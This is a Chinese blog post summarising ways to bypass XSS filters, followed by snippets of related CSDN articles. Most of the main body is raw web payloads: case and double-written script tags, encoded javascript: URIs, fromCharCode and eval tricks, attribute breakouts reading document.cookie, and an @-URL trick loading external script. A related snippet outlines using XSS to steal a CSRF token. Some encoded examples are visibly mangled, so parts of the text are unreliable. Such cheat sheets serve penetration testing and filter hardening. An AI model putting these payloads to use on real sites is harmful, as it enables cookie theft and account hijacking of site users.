XSS绕过方法总结

最新推荐文章于 2024-03-26 20:12:43 发布
最新推荐文章于 2024-03-26 20:12:43 发布
阅读量1.5k 收藏 4
点赞数 2
分类专栏: xss 文章标签: xss javascript web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xinyue9966/article/details/121099189
版权

xss绕过方法
<script>alert('hello csdn');</script>//经典

大小写绕过

"'><Script>alert('xss')</Script>

双写绕过

<scrscriptipt>alert(1)</scrscriptipt>

替换绕过
过滤 alert 用prompt,confirm,top’alert’代替绕过
过滤() 用``代替绕过
过滤空格 用%0a(换行符),%0d(回车符),/**/代替绕过
小写转大写情况下 字符ſ大写后为S(ſ不等于s)
%00截断绕过

"/><script>alert(document.cookie)</script><!--

编码绕过
实体编码
javascript:alert(1) 十六进制
javascript:alert(1) 十进制
unicode编码
javascripu0074:alert(1)
url编码
javascrip%74:alert(1)
fromCharCode方法绕过
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)
eval(FromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))
javascript伪协议绕过
无法闭合双引号的情况下,就无法使用onclick等事件,只能伪协议绕过,或者调用外部js
换行绕过正则匹配
onmousedown
=alert(1)
注释符
// 单行注释

<-- --> 注释多行内容
<-- --!> 注释多行内容
–> 单行注释后面内容
/* */ 多行注释
有时还可以利用浏览器的容错性,不需要注释
闭合标签空格绕过

<input type="text" name="address1" value="" onfocus="alert(document.cookie)">

@符号绕过url限制
例如:https://www.segmentfault.com@xss.haozi.me/j.js
其实访问的是@后面的内容
“)逃逸函数后接分号
例:”);alert(1)//

<input type="text" name="address1" value=""/><script>alert(document.cookie)</script><!- ">

<%
strUserCode =  Request.QueryString(“code”);
strUser =  Request.Form(“USER”);
strID =    Request.Cookies(“ID”);
%>

绕过转义限制
例:
")
alert(1) //
xss paylaod形式

xss xss
幸运之河
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全XSS过滤器。
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)
白帽黑客八哥的博客
12-12 4426
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
常见绕过方法总结
最新发布
weixin_66839513的博客
03-26 1084
两个空格代替一个空格,用Tab代替空格,%a0=空格绕过的替代类型:%20 --代表url编码的空格,在空格过滤时可以代替。%09--用于在输出或显示文本时在该位置产生一个固定的水平间距,类似于tab键。%0a--代表换行符%0b--用于在输出或显示文本时在该位置产生一个固定的垂直间距,类似于tab键。%0c--%0d--回车换行%a0--代表的是非断行空格%00--%00代表的是ASCII码中的空字符/**/可以将空格字符替换成注释/**/,也可以使用内联注释,/!code。
SQL注入绕过技巧
whj_study的博客
12-18 2677
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,3 select * from users where id=8.0 select 1,2,3 2.括号绕过空格:   如..
[ 常见漏洞篇 ]常见web漏洞总结------XSS绕过方式
qq_51577576的博客
12-06 3507
本文具体写到了常见的XSS绕过方式,间的的介绍了一下修复方式 写的比较细,比较深,需要一定的基础才能看懂,仔细读完 不懂的可以百度查一查或者私信我,相信会有很大收获 目录 一、Xss绕过方式: 1. 前端过滤 2.双写绕过 3. 事件绕过 4. 大小写绕过 5. 注释干扰绕过 6.伪协议绕过 7.空格回车Tab绕过 8. 编码绕过 1. base64编码: 2. JS编码: 3. 十六进制: 4. unicode: 5. HTML实体编码: 6. URL...
xss绕过
weixin_51692662的博客
08-19 2571
xss绕过
SQL注入之绕过空格
nihao_ma_的博客
05-07 1932
SQL注入之空格绕过技巧
14.xss之alert绕过&cookie绕过
HWHXY的博客
12-25 4492
前言 该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypass。 XSS 特征 拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过 xss绕过 alert用top[‘ale’+‘rt’]绕过 alert()用top[‘ale’+‘rt’].call绕过 cookie用document[变量]绕过 最终payload <img src=\"x\" onerror=\"c='coo'+'kie';top['ale'+'rt'].c
xss-vuln学习通关总结
08-24
4. **基于字符集的XSS**:利用字符转义规则的漏洞,通过Unicode等方式绕过过滤机制进行攻击。 5. **基于Flash的跨站XSS**:属于反射型XSS的一种,通过Flash中的AS脚本操作cookie,配合其他XSS攻击方法,窃取和操纵...
Xss字符编码突破过滤方法总结
02-11
XSS 字符编码突破过滤方法总结 ...这9种XSS字符编码突破过滤方法可以帮助攻击者绕过安全检查, Inject 恶意代码,导致各种安全问题。因此,Web应用程序开发者需要时刻警惕XSS攻击,采取各种安全措施来防止XSS攻击。
xss-labs靶场通关
10-13
第六关源码使用str_replace函数将替换为空,但是这个函数并没有将所有的xss payload都过滤掉,我们可以使用其他方法绕过过滤,触发xss攻击。 xss-labs靶场的六关源码展示了xss攻击的多种形式和方法,每一关都有其...
第十四节 IE中利用CSS触发XSS-01
09-15
攻击者可以使用CSS表达式来执行恶意代码,或者使用注释来绕过关键字过滤。为了防止XSS攻击,开发人员需要小心地使用CSS,并遵守安全编程实践。 相关知识点 * CSS的用途和优点 * CSS表达式的概念和应用 * 注释在CSS...
ourphp存储型xss漏洞1
08-03
这意味着攻击者可以通过输入包含双引号的恶意字符串,绕过现有的过滤机制。 在www/templates/default/cn/cn_shoptop.html文件的第40行,搜索关键字被用于生成页面内容,没有进一步的过滤或转义,这就为XSS攻击提供...
XSS篇——XSS过滤绕过技巧
weixin_50464560的博客
05-07 3490
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
XSS概念以及一些绕过方式
New Wh1te Hat
04-13 820
XSS概念 指前端代码不严谨,导致解析时出现漏洞,致使攻击者可以往Web页面里插入恶意html代码,当用户浏览该页时,嵌入其中Web里面的html代码会被执行,达到恶意的目的。攻击者利用WEB漏洞让服务器响应包携带恶意js代码导致管理员/用户访问时触发 XSS类型 反射型:把用户输入的数据反射给浏览器,欺骗用户自己去点击链接才能触发XSS代码,一般出现在搜索页面,提交按钮等。 存储型:一般会出现在网站的留言、评论、博客日志等交互处。恶意脚本被储存在客户端或者服务器的数据库中,当其他用户浏览该...
安全】P 4-11 空格分隔属性的XSS
Z_David_Z的博客
02-18 151
目录0x01 XSS探测0X02 触发XSS 0x01 XSS探测 空格分隔属性探测 空格之后的内容 0X02 触发XSS Payload: 111 onmouseover=alert(document.domain); ----E-----N-----D----- ????如有问题,请各位师傅斧正,你的支持是我最大的动力。 ...
高能来袭!SpringBoot一键去除参数前后空格XSS过滤实战解析
m0_72101998的博客
06-20 2028
去除XSS字符串需要借助工具类 jsoup ,这里jsoup有一点需要注意的是,jsoup的功能可能有点太强大了,能把xss攻击的内容直接过滤掉了不说,也会对英文尖括号 转义,到接口里面拿到的参数就变成了 ,存库里面的就是转义后的字符串了。取出来的时候需要转一下。比如前台传的参数传的是: 123alter('11111111')455过滤处理了后,到后台接口里面就成了: [123455]如果上面的结果能接受,那么这个工具类就可以用。引入依赖 jsoup ......
XSS绕过技术
weixin_38023368的博客
03-22 674
Cross-Site Scripting(XSS)是一类出现在 web 应用程序上的安全弱点,攻击者可以通过 XSS 插入一 些代码,使得访问页面的其他用户都可以看到,XSS 通常是可以被看作漏洞的。它允许攻击者绕过安全机 制,通过尝试各种不同的方法插入恶意代码,攻击者可以得到敏感页面的权限,会话,cookies,或者其他可以利用的数据。 1.xss的分类 xss有三类分别是:非持
XSS学习笔记(入门篇)
Chris Lee
01-16 949
最近的学习速度挺快的,对于寒假的计划是对于各种知识点都了解大概并且基本懂得原理,在开学之后对相关书籍深入研究! 这里我就先总结下几个XSS应用的例子吧。 一.利用&lt; &gt;标记注射html / javascript 如果可以随心所欲引入&lt; &gt;标记,那么就可以通过script输入有javasript编写的恶意脚本代码。 eg:&lt;script&gt;alert("你...
csrf高级漏洞通过xss绕过方法
05-19
CSRF(Cross-Site Request Forgery)攻击是指攻击者通过诱导受害者在已登录的网站上执行一些特定操作,从而在不知情的情况下进行一些非法操作。而XSS(Cross-Site Scripting)攻击则是指攻击者通过注入恶意脚本的方式,在受害者的浏览器中执行一些非法操作。 在某些情况下,攻击者可以利用XSS漏洞来绕过CSRF防御措施。具体方法如下: 1. 利用XSS漏洞注入恶意代码,获取受害者的CSRF Token。 2. 将获取到的CSRF Token发送给攻击者的服务器。 3. 攻击者使用获取到的CSRF Token伪造请求,向目标网站发送恶意请求。 4. 目标网站验证请求中的CSRF Token是否与用户当前的Token一致,如果一致则认为是合法请求,从而执行攻击者的恶意操作。 为了防止XSS漏洞绕过CSRF防御措施,可以采取以下措施: 1. 对用户输入的数据进行充分的过滤和验证,避免XSS漏洞的出现。 2. 在向用户发送包含敏感信息的页面时,使用HTTP-only Cookie,避免被恶意代码窃取。 3. 在生成CSRF Token时,将其与用户的Session ID绑定,避免被攻击者获取。 4. 对于重要的操作(如修改密码、删除账户等),要求用户输入密码进行再次认证,以防止CSRF攻击的发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值